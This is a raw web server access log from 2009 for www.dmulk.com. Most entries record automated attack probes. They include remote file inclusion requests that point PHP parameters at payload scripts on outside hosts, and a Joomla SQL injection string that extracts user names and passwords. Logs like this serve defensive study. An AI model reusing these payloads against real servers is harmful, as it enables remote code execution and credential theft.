92.50.143.90 - - [07/Sep/2009:11:16:02 -0700] "GET /logs/access_090330.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:05 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:05 -0700] "GET /logs/access_090509.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:05 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:16:08 -0700] "GET /logs/access_070704.log HTTP/1.0" 200 11515 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:12 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:16:12 -0700] "GET /logs/access_080304.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:16:13 -0700] "GET /logs/access_080304.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:16:14 -0700] "GET /logs/access_090326.log%20%20//appserv/main.php?appserv_root=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:21 -0700] "GET /logs/access_090509.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:21 -0700] "GET /logs/access_090330.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:21 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.0" 200 116177 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:16:23 -0700] "GET /logs/access_090330.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:36 -0700] "GET /logs/access_090722.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:36 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:36 -0700] "GET /logs/access_090330.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:36 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.218 - - [07/Sep/2009:11:16:37 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_26/ HTTP/1.0" 200 5579 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:38 -0700] "GET /logs/access_090722.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:38 -0700] "GET /logs/access_090330.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:38 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:16:38 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
67.71.48.169 - - [07/Sep/2009:11:17:02 -0700] "GET /logs/access_090801.log/index.php?pg=http://www.seqent.com/customercarecenter/languages/bo.lang?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.204.51.161 - - [07/Sep/2009:11:17:08 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.campani.net/logs/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:11:17:37 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:11:17:37 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:11:17:37 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:11:18:54 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.139.209.74 - - [07/Sep/2009:11:19:16 -0700] "GET /logs/access_081230.log%20/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/* HTTP/1.0" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
209.139.209.74 - - [07/Sep/2009:11:19:17 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.157.4.41 - - [07/Sep/2009:11:19:18 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
209.139.209.74 - - [07/Sep/2009:11:19:18 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/* HTTP/1.1" 200 20011 "-" "libwww-perl/5.813" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:19:31 -0700] "GET /logs/access_080419.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:19:50 -0700] "GET /logs/access_090724.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.71.48.169 - - [07/Sep/2009:11:19:56 -0700] "GET /logs/access_090427.log%20/index.php?pg=http://www.seqent.com/customercarecenter/languages/bo.lang?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.139.209.74 - - [07/Sep/2009:11:20:25 -0700] "GET /logs/access_081107.log/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:20:27 -0700] "GET /logs/access_080111.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:20:33 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:20:33 -0700] "GET /logs/access_080620.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:20:34 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19887 "-" "Mozilla/5.0" "www.dmulk.com"
209.139.209.74 - - [07/Sep/2009:11:20:34 -0700] "GET /logs/access_081230.log/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:44 -0700] "GET /logs/access_080906.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:44 -0700] "GET /logs/access_080906.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:44 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:45 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:45 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:45 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:47 -0700] "GET /logs/access_080906.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:47 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:47 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:20:51 -0700] "GET /logs/access_090721.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:20:57 -0700] "GET /logs/access_080313.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:20:57 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:20:57 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:21:02 -0700] "GET /logs/access_080906.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:02 -0700] "GET /logs/access_080906.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:02 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:02 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:02 -0700] "GET /logs/access_080906.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:02 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:02 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:21:06 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:21:06 -0700] "GET /logs/access_080906.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:21:06 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:21:08 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:21:08 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:21:15 -0700] "GET /logs/access_090721.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:21:15 -0700] "GET /logs/access_090721.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:21:15 -0700] "GET /bikes/dteel/ HTTP/1.0" 200 5230 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:21:16 -0700] "GET /logs/access_080626.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:17 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:17 -0700] "GET /logs/access_080304.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:17 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:20 -0700] "GET /logs/access_080829.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:21:20 -0700] "GET /logs/access_080829.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:21:21 -0700] "GET /logs/access_090721.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:22 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:22 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:22 -0700] "GET /logs/access_080304.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:26 -0700] "GET /logs/access_090520.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:21:30 -0700] "GET /logs/access_090520.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:21:32 -0700] "GET /logs/access_090606.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:21:35 -0700] "GET /logs/access_080819.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:21:35 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:21:35 -0700] "GET /logs/access_080620.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:11:21:36 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19887 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:21:37 -0700] "GET /logs/access_070919.log HTTP/1.0" 200 35028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:21:46 -0700] "GET /logs/access_080313.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [07/Sep/2009:11:21:51 -0700] "GET /logs/access_080612.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:51 -0700] "GET /logs/access_080322.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:51 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [07/Sep/2009:11:21:51 -0700] "GET /logs/access_090901.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:51 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 19840 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:52 -0700] "GET /logs/access_080322.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:52 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:53 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 19840 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:21:57 -0700] "GET /logs/access_080313.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:58 -0700] "GET /logs/access_080121.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:21:58 -0700] "GET /logs/access_080121.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:22:01 -0700] "GET /logs/access_080322.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:22:01 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:22:02 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 19840 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:11:22:05 -0700] "GET /logs/access_080121.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:22:06 -0700] "GET /logs/access_080620.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:22:06 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19887 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:22:10 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:22:13 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:22:14 -0700] "GET /logs/access_090611.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:22:27 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:22:28 -0700] "GET /logs/access_080620.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:11:22:31 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 200 19887 "-" "Mozilla/5.0" "www.dmulk.com"
